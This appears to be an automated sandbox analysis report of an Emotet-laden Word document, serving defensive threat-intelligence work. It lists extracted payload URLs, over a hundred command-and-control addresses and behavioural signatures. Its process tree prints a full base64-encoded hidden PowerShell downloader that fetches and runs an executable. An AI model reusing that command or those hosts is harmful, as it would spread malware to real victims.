Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
20-12-2019 08:40
General
Malware Config
Extracted
http://zaferaniyehcenter.com/wp-admin/d3k2c/
http://newsite.modernformslights.com/wp-content/gj18fr/
http://dunhuangcaihui.com/feed/wiytu/
http://blog.kpourkarite.com/et0a/ZnG6LPQDOd/
https://hellothuoctot.com/wp-content/dw7e9/
Extracted
emotet
24.105.202.216:443
24.94.237.248:80
76.164.99.46:80
108.61.99.179:8080
165.227.156.155:443
159.69.89.130:8080
167.99.105.223:7080
87.230.19.21:8080
91.73.197.90:80
210.6.85.121:80
47.156.70.145:80
197.254.221.174:80
58.171.42.66:8080
66.34.201.20:7080
2.38.99.79:80
95.128.43.213:8080
190.12.119.180:443
67.225.179.64:8080
165.228.24.197:80
121.88.5.176:443
120.151.135.224:80
206.81.10.215:8080
174.81.132.128:80
144.139.247.220:80
206.189.112.148:8080
73.176.241.255:80
120.150.246.241:80
45.33.49.124:443
93.147.141.5:80
101.187.134.207:443
47.149.28.234:80
86.98.156.239:443
1.33.230.137:80
46.105.131.87:80
101.187.247.29:80
110.142.38.16:80
62.138.26.28:8080
37.157.194.134:443
160.16.215.66:8080
81.0.63.86:8080
110.143.57.109:80
70.46.247.81:80
174.77.190.137:8080
5.196.74.210:8080
2.237.76.249:80
80.21.182.46:80
201.251.133.92:443
68.118.26.116:80
85.67.10.190:80
217.160.182.191:8080
1.215.28.101:8080
188.152.7.140:80
2.235.190.23:8080
108.20.69.44:80
186.67.208.78:8080
179.13.185.19:80
103.86.49.11:8080
176.106.183.253:8080
31.31.77.83:443
178.209.71.63:8080
192.241.255.77:8080
5.154.58.24:80
12.176.19.218:80
73.214.99.25:80
59.148.227.190:80
173.12.14.133:8080
64.147.15.138:80
128.65.154.183:443
167.71.10.37:8080
184.167.148.162:80
92.222.216.44:8080
82.27.181.93:80
201.173.217.124:443
62.75.187.192:8080
73.11.153.178:8080
178.237.139.83:8080
61.197.110.214:80
138.122.5.214:8080
104.131.11.150:8080
190.53.135.159:21
91.205.215.66:443
159.65.25.128:8080
219.78.255.48:80
74.105.102.97:8080
178.210.51.222:8080
104.137.176.186:80
87.106.136.232:8080
64.53.242.181:8080
201.184.105.242:443
190.220.19.82:443
173.91.11.142:80
182.176.132.213:8090
71.83.82.123:8080
85.72.180.68:80
66.25.34.20:80
138.59.177.106:443
59.103.164.174:80
50.116.86.205:8080
45.51.40.140:80
200.7.243.108:443
100.14.117.137:80
195.244.215.206:80
149.202.153.252:8080
169.239.182.217:8080
5.88.182.250:80
116.48.142.21:443
186.75.241.230:80
108.191.2.72:80
47.6.15.79:80
218.44.21.114:80
190.189.224.117:443
139.130.241.252:443
78.24.219.147:8080
31.177.54.196:443
24.93.212.32:80
104.236.246.93:8080
108.179.206.219:8080
87.106.139.101:8080
104.131.44.150:8080
209.141.54.221:8080
107.170.24.125:8080
189.209.217.49:80
85.152.174.56:80
176.31.200.130:8080
75.80.148.244:80
190.147.215.53:22
66.209.97.122:8080
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4876 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4876 WINWORD.EXE 4560 57.exe 4580 57.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\57.exe => C:\Windows\SysWOW64\inboxdef.exe 57.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4876 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3004 4140 Powershell.exe 74 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3004 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3004 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3004 wrote to memory of 4560 3004 Powershell.exe 80 PID 4560 wrote to memory of 4580 4560 57.exe 81 -
Executes dropped EXE 2 IoCs
pid Process 4560 57.exe 4580 57.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e433076a8225ccf66fd78a74aaedac45aeff8861f3b00a6b35a8d80695dd912e.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4876
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABGAHcAdQBvAHEAZwBpAHIAaQBhAD0AJwBWAGgAdQBzAHQAZgBlAGMAdwAnADsAJABWAHAAZgBhAGkAeAB2AHcAZwBrAHYAdwBsACAAPQAgACcANQA3ACcAOwAkAEUAawB6AHEAdgBrAHQAeAB5AGgAcgBvAD0AJwBRAHMAbgB4AHgAYQBjAHEAJwA7ACQARgBwAGoAdAB0AHcAawBoAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFYAcABmAGEAaQB4AHYAdwBnAGsAdgB3AGwAKwAnAC4AZQB4AGUAJwA7ACQATABzAGMAcQBnAHMAbwBlAHkAYwBqAD0AJwBSAHcAeABoAGkAaABvAHEAZwAnADsAJABBAGwAawBnAGkAbwBzAHkAbQB1AD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBCAEMAbABpAGUAbgB0ADsAJABXAGIAZgB4AG4AcABwAHoAcABlAGYAPQAnAGgAdAB0AHAAOgAvAC8AegBhAGYAZQByAGEAbgBpAHkAZQBoAGMAZQBuAHQAZQByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkADMAawAyAGMALwAqAGgAdAB0AHAAOgAvAC8AbgBlAHcAcwBpAHQAZQAuAG0AbwBkAGUAcgBuAGYAbwByAG0AcwBsAGkAZwBoAHQAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGcAagAxADgAZgByAC8AKgBoAHQAdABwADoALwAvAGQAdQBuAGgAdQBhAG4AZwBjAGEAaQBoAHUAaQAuAGMAbwBtAC8AZgBlAGUAZAAvAHcAaQB5AHQAdQAvACoAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AawBwAG8AdQByAGsAYQByAGkAdABlAC4AYwBvAG0ALwBlAHQAMABhAC8AWgBuAEcANgBMAFAAUQBEAE8AZAAvACoAaAB0AHQAcABzADoALwAvAGgAZQBsAGwAbwB0AGgAdQBvAGMAdABvAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBkAHcANwBlADkALwAnAC4AIgBzAHAAYABMAEkAdAAiACgAJwAqACcAKQA7ACQATwBtAHAAegBlAHgAcABvAGwAawBmAD0AJwBDAHIAZwBzAG0AcABsAHMAawAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBkAHkAbQBnAHkAYQBjAGYAdgAgAGkAbgAgACQAVwBiAGYAeABuAHAAcAB6AHAAZQBmACkAewB0AHIAeQB7ACQAQQBsAGsAZwBpAG8AcwB5AG0AdQAuACIAZABgAE8AYABXAE4AYABsAE8AYQBkAEYASQBMAEUAIgAoACQATQBkAHkAbQBnAHkAYQBjAGYAdgAsACAAJABGAHAAagB0AHQAdwBrAGgAcgApADsAJABBAHoAdAB1AGkAbAB4AGUAbgBtAGMAdQA9ACcAQQBiAG0AdgB1AHcAbQB0AHAAZgByACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARgBwAGoAdAB0AHcAawBoAHIAKQAuACIAbABlAG4AYABnAHQASAAiACAALQBnAGUAIAAyADAAOAA5ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGEAYABSAFQAIgAoACQARgBwAGoAdAB0AHcAawBoAHIAKQA7ACQAUgB0AHgAZQBiAHQAeQBlAD0AJwBGAGEAbQBhAHAAdgB6AHcAZABkAG0AbwAnADsAYgByAGUAYQBrADsAJABQAG8AaQBoAGoAbgBkAGgAcAB1AG4AdABvAD0AJwBKAHEAdgB3AHIAcQB1AGsAbQBkAHQAZgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHIAZAB1AGEAbwBtAGsAcgB2AHEAcgB4AD0AJwBNAHYAaABiAGUAdQBtAHIAcgBoAGcAdQAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\57.exe"C:\Users\Admin\57.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4560 -
C:\Users\Admin\57.exe--38358dac3⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
PID:4580
-
-